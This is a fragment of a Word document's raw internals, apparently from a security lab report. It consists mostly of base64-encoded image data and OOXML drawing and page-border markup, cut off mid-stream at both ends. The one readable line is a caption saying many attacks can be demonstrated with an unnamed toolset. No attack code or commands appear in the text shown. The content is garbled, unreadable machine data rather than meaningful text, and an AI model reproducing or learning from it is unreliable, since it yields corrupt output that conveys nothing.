P/IkklRfEz9m3TPiV4ruNZud&#10;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NdUJ0pBAAAwA0AAA4AAAAA&#10;AAAAAAAAAAAAPQIAAGRycy9lMm9Eb2MueG1sUEsBAi0ACgAAAAAAAAAhAKhxdA2fPgEAnz4BABQA&#10;AAAAAAAAAAAAAAAAkgYAAGRycy9tZWRpYS9pbWFnZTEuanBnUEsBAi0AFAAGAAgAAAAhAH8cJuLd&#10;AAAABQEAAA8AAAAAAAAAAAAAAAAAY0UBAGRycy9kb3ducmV2LnhtbFBLAQItABQABgAIAAAAIQA3&#10;ncEYugAAACEBAAAZAAAAAAAAAAAAAAAAAG1GAQBkcnMvX3JlbHMvZTJvRG9jLnhtbC5yZWxzUEsF&#10;BgAAAAAGAAYAfAEAAF5HAQAAAA==&#10;">
                <v:rect id="Rectangle 6351" o:spid="_x0000_s1377" style="position:absolute;left:59448;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oxwAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;FITvBf/D8gq91Y2V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BR+QOjHAAAA3QAA&#10;AA8AAAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD7AgAAAAA=&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="0744DAC4" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 6352" o:spid="_x0000_s1378" style="position:absolute;top:34009;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14:paraId="6944AB8F" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 6353" o:spid="_x0000_s1379" style="position:absolute;top:36036;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14:paraId="00A4A7C2" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Picture 6360" o:spid="_x0000_s1380"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qAjwwAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE/Pa8Iw&#10;FL4P/B/CE7zN1Ll1Uo0yCoMdhsyuF2/P5tkWm5eSZLb7781B8Pjx/d7sRtOJKznfWlawmCcgiCur&#10;W64VlL+fzysQPiBr7CyTgn/ysNtOnjaYaTvwga5FqEUMYZ+hgiaEPpPSVw0Z9HPbE0fubJ3BEKGr&#10;pXY4xHDTyZckSaXBlmNDgz3lDVWX4s8oeBvbang9HYs8/1n1bk/l+3ddKjWbjh9rEIHG8BDf3V9a&#10;QbpM4/74Jj4Bub0BAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAA&#10;AAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAA&#10;AAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAp/KgI8MAAADdAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;">
                  <v:imagedata r:id="rId135" o:title=""/>
                </v:shape>
                <v:shape id="Shape 6361" o:spid="_x0000_s1381"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VjxQAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;FITvBf/D8gRvdRMtIURXEVulx9QUirdH9pkEs29Ddk3Sf98tFHocZuYbZrufTCsG6l1jWUG8jEAQ&#10;l1Y3XCn4LE7PKQjnkTW2lknBNznY72ZPW8y0HfmDhouvRICwy1BB7X2XSenKmgy6pe2Ig3ezvUEf&#10;ZF9J3eMY4KaVqyhKpMGGw0KNHR1rKu+Xh1HwNq6+/DU/39P4ZnX3Ur3yOi+UWsynwwaEp8n/h//a&#10;71pBsk5i+H0TnoDc/QAAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAA&#10;AAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAAL&#10;AAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQBUHsVjxQAAAN0AAAAP&#10;AAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA+QIAAAAA&#10;" path="m,3329305r5899150,l5899150,,,,,3329305xe" filled="f" strokeweight="2pt">
                  <v:path arrowok="t" textboxrect="0,0,5899150,3329305"/>
                </v:shape>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE295E1" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B9CC528" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251731968" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4597EE7F" wp14:editId="70A567B5">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>304800</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>379475</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="74676" cy="9936480"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="44344" name="Group 4434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80" name="Shape 500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1" name="Shape 500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82" name="Shape 500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3" name="Shape 500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84" name="Shape 500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44" style="width:5.88pt;height:782.4pt;position:absolute;mso-position-horizontal-relative:page;mso-position-horizontal:absolute;margin-left:24pt;mso-position-vertical-relative:page;margin-top:29.8799pt;" coordsize="746,99364">
                <v:shape id="Shape 50085" style="position:absolute;width:91;height:99364;left:0;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 50086" style="position:absolute;width:91;height:99364;left:91;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 50087" style="position:absolute;width:381;height:99364;left:182;top:0;" coordsize="38100,9936480" path="m0,0l38100,0l38100,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 50088" style="position:absolute;width:91;height:99364;left:563;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 5008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32992" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="14888856" wp14:editId="54E30F34">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>7185660</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>379475</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="74676" cy="9936480"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="44354" name="Group 4435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090" name="Shape 500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1" name="Shape 500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2" name="Shape 500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3" name="Shape 500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4" name="Shape 500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54" style="width:5.88pt;height:782.4pt;position:absolute;mso-position-horizontal-relative:page;mso-position-horizontal:absolute;margin-left:565.8pt;mso-position-vertical-relative:page;margin-top:29.8799pt;" coordsize="746,99364">
                <v:shape id="Shape 50095" style="position:absolute;width:91;height:99364;left:655;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 50096" style="position:absolute;width:91;height:99364;left:563;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 50097" style="position:absolute;width:381;height:99364;left:182;top:0;" coordsize="38100,9936480" path="m0,0l38100,0l38100,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 50098" style="position:absolute;width:91;height:99364;left:91;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 5009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4844895D" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="10" w:line="249" w:lineRule="auto"/>
        <w:ind w:left="-5" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">As you can see many attacks can be demonstrated with the help of this toolset </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08569C1D" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="40" w:right="-181"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="25CB0E11" wp14:editId="79E76349">
                <wp:extent cx="5961279" cy="3423561"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="44342" name="Group 44342"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5961279" cy="3423561"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="5961279" cy="3423561"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="6358" name="Rectangle 6358"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="5919216" y="3274361"/>
                            <a:ext cx="55943" cy="198436"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="56958DA8"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363" name="Picture 6363"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId136"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="12700" y="12700"/>
                            <a:ext cx="5873750" cy="3328035"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
                        <wps:cNvPr id="6364" name="Shape 6364"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5899150" cy="3353435"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="5899150" h="3353435">
                                <a:moveTo>
                                  <a:pt x="0" y="3353435"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="5899150" y="335343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CB0E11" id="Group 44342" o:spid="_x0000_s1382" style="width:469.4pt;height:269.55pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="59612,34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qfV52gMAAB4KAAAOAAAAZHJzL2Uyb0RvYy54bWy8Vm2P2zYM/j5g&#10;/8Hw917iOM4lxiXF0FsPBYb10JcfoMhybFSWBEl5uf36kZTkpJd2N7RAA8SmJZJ6+IikdPf6NMjs&#10;IKzrtVrnxc00z4TiuunVbp1//vT21TLPnGeqYVIrsc6fhMtfb37/7e5oajHTnZaNsBk4Ua4+mnXe&#10;eW/qycTxTgzM3WgjFEy22g7Mw6fdTRrLjuB9kJPZdLqYHLVtjNVcOAej92Ey35D/thXcv29bJ3wm&#10;1zlg8/S09Nzic7K5Y/XOMtP1PMJgP4BiYL2CRUdX98yzbG/7K1dDz612uvU3XA8T3bY9FxQDRFNM&#10;n0XzYPXeUCy7+rgzI01A7TOeftgt//vwYM1H82iBiaPZARf0hbGcWjvgG1BmJ6LsaaRMnHzGYbBa&#10;LYrZ7SrPOMyV81lZLYpAKu+A+Ss73v35guUkLTz5Cs7RQIK4Mwfu5zj42DEjiFpXAwePNuubdb4o&#10;K8hXxQbI1A+QO0ztpMholOgh3ZEsVzvg7RtMVatiNSsWeYaczG7nZeJkZK1azcvAWbFawjxSNgbO&#10;amOdfxB6yFBY5xagUHaxw1/OB9WkgstLhU+l3/ZShlkcAf4SQpT8aXuiIAvYrhjNVjdPEHqn7T/v&#10;oYhbqY/rXEcpx7qG1XE2z+Q7BZRjCSXBJmGbBOvlG02FFvD8sfe67QkwIgirRWCwl5s70/Ma/jGx&#10;Qbra1JcbAFj5vRV5dDL8Lx8Ds1/25hXUoGG+3/ay90/UT4BmBKUOjz3HvcWPy/xYwLaF/AAFXBey&#10;A8aAz6SJdrgJ+P2Vm63sDe4QcoNyBAzN6FkxfyPm0CjuNd8PQvnQ+ayQgF0r1/XG5ZmtxbAVkMT2&#10;XRNL0HkrPO9wwRYWxowO6TFOEMozMMT8nZyGKp/C7kNGBwkcsXrM5+VteVvBNHWBcracltXPpDTB&#10;CkBIBFzYnX5JB1jM0w5Tj8D9nad6gUx4ufoDS/FoOTO0WhVnhqpyfsUQ34eiR2JTocOB0oSSh7Eu&#10;Sfykkoit4T/PNshvtEOnKGZQ4NUyYumgPZUBCs4PUPmfNGn6c+NOGiFzzjpSXeqOPrHlRZ/BIuml&#10;tyHfl/pEFXS/pJHeQfOCzgsdLrUTYQEMi7rnGCroXZIpFUY9q+aYwJzBLaOFyqGGCgesahLOq5bp&#10;/JMUyIdUH0QLzRMOvILsnN1t30ibHRi2O/rFfCdVtAkVF62m37VCVSZNx6Kv6CYuQHFFT6gp6Eoz&#10;golueUQT7jVwO4A40+0GuBiNCJZWfrRXcCejBemoCNGeOzXyEouOJLqEEKJ4YcJbzuU3aZ2vdZt/&#10;AQAA//8DAFBLAwQKAAAAAAAAACEAQOyf+jxYAQA8WAEAFAAAAGRycy9tZWRpYS9pbWFnZTEuanBn&#10;/9j/4AAQSkZJRgABAQEAYABgAAD/2wBDAAMCAgMCAgMDAwMEAwMEBQgFBQQEBQoHBwYIDAoMDAsK&#10;CwsNDhIQDQ4RDgsLEBYQERMUFRUVDA8XGBYUGBIUFRT/2wBDAQMEBAUEBQkFBQkUDQsNFBQUFBQU&#10;FBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBT/wAARCAIiA8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I+I/&#10;7SVv4X/tmDTLzRDc6Y729xc3048u0kHmfu5I45PM/wCWcf8A38rk/gX+094u+JPxSs9A1CPwzfaD&#10;dWk8sepaGLjzY5I/+WcnmSV8oftCeDvGd58VvHaWvg/XL3TZPEUl7/o2mXEkd3H+7/6Z/vP9XXcf&#10;sIeE9e8N/GGzgm8KeINLsvs9xcXF9q1g9vGJPL8uOOj3z7L+ysDDA886n7zk5/i/8lP0V0/XrS+n&#10;aCCXfKnmZ9tknln9atR6pBNfSWqb/Nj+/wDJXIR+Dry1+0W/2i1ls7y7+0z28icGTzd//oGP++BV&#10;zSfB8+mavp121xH5dvb+U8f/AGzjj/8AadB8adLFewzfd+f53j+7+dW94rk9S8MXep24gd4Y4kku&#10;JP8Af8zzP/jlQat4Nmk+2jT3ht45